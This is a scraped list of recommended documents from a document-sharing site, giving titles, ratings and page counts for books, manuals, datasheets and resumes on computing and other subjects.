The 101 Most Important UNIX and Linux Commands
Ronald J. Leach
No ratings yet
A Beginner's guide to Python
From Everand
A Beginner's guide to Python
Steven Mcananey
No ratings yet
Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation
From Everand
Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation
Bruce Dang
No ratings yet
Linux Commands By Example
From Everand
Linux Commands By Example
Khaled Jamal
4.5/5 (3)
Application Software: in This Lesson Students Will
No ratings yet
Application Software: in This Lesson Students Will
9 pages
It Question Bank
No ratings yet
It Question Bank
3 pages
Class 7 Comprehensive
No ratings yet
Class 7 Comprehensive
3 pages
DS WhitePapers Concurrent-Engineering-with-3DEXPERIENCE V1.0
No ratings yet
DS WhitePapers Concurrent-Engineering-with-3DEXPERIENCE V1.0
28 pages
Quant Checklist 198 PDF 2022 by Aashish Arora
No ratings yet
Quant Checklist 198 PDF 2022 by Aashish Arora
68 pages
Microsoft Word Tutorial Course Presentation
100% (1)
Microsoft Word Tutorial Course Presentation
16 pages
(MX) Reduced Flow Samples After Upgrading To Junos OS 15.1 - Juniper Networks
No ratings yet
(MX) Reduced Flow Samples After Upgrading To Junos OS 15.1 - Juniper Networks
3 pages
Sap La HRH65 en 2405 SG
No ratings yet
Sap La HRH65 en 2405 SG
13 pages
PageSpeed Insights
No ratings yet
PageSpeed Insights
1 page
The Swan Song
No ratings yet
The Swan Song
18 pages
Turbo Intruder
No ratings yet
Turbo Intruder
22 pages
Master Pack Slip
No ratings yet
Master Pack Slip
2 pages
Roll No.: A Laboratory Manual FOR Operating Systems
No ratings yet
Roll No.: A Laboratory Manual FOR Operating Systems
112 pages
Aravind Java Resume
No ratings yet
Aravind Java Resume
4 pages
Operating System
No ratings yet
Operating System
5 pages
Final Copy With References
No ratings yet
Final Copy With References
89 pages
Linkvil W611W Datasheet
No ratings yet
Linkvil W611W Datasheet
3 pages
A Node-Positioning Algorithm For General Trees: TR89-034 September, 1989
No ratings yet
A Node-Positioning Algorithm For General Trees: TR89-034 September, 1989
32 pages
How To Configure or Build Ceph Storage Cluster in Openstack
No ratings yet
How To Configure or Build Ceph Storage Cluster in Openstack
30 pages
Windows 10 Pro Redstone 5 X64 OEM ESD It-IT MAR 2019 (Gen2)
No ratings yet
Windows 10 Pro Redstone 5 X64 OEM ESD It-IT MAR 2019 (Gen2)
2 pages
Saksham Jain: November 2024 - Present
No ratings yet
Saksham Jain: November 2024 - Present
1 page
Com 322 Database 2
No ratings yet
Com 322 Database 2
14 pages
Symantec Endpoint Protection
No ratings yet
Symantec Endpoint Protection
5 pages
High-Speed, Area Efficient VLSI Architecture of Wallace-Tree Multiplier For DSP-applications
No ratings yet
High-Speed, Area Efficient VLSI Architecture of Wallace-Tree Multiplier For DSP-applications
5 pages
SQL Trace and Tkprof
No ratings yet
SQL Trace and Tkprof
16 pages
Chemistry A Molecular Approach 2nd Canadian Edition by Nivaldo J Tro Ebook and TestBank Bundle Unlocked Test Bank
No ratings yet
Chemistry A Molecular Approach 2nd Canadian Edition by Nivaldo J Tro Ebook and TestBank Bundle Unlocked Test Bank
334 pages
Rockchip RV1126 Datasheet V1.2 20200522
No ratings yet
Rockchip RV1126 Datasheet V1.2 20200522
57 pages
Overview of Cloud Storage
No ratings yet
Overview of Cloud Storage
4 pages
Alaas Sop PHD Datsci e
No ratings yet
Alaas Sop PHD Datsci e
1 page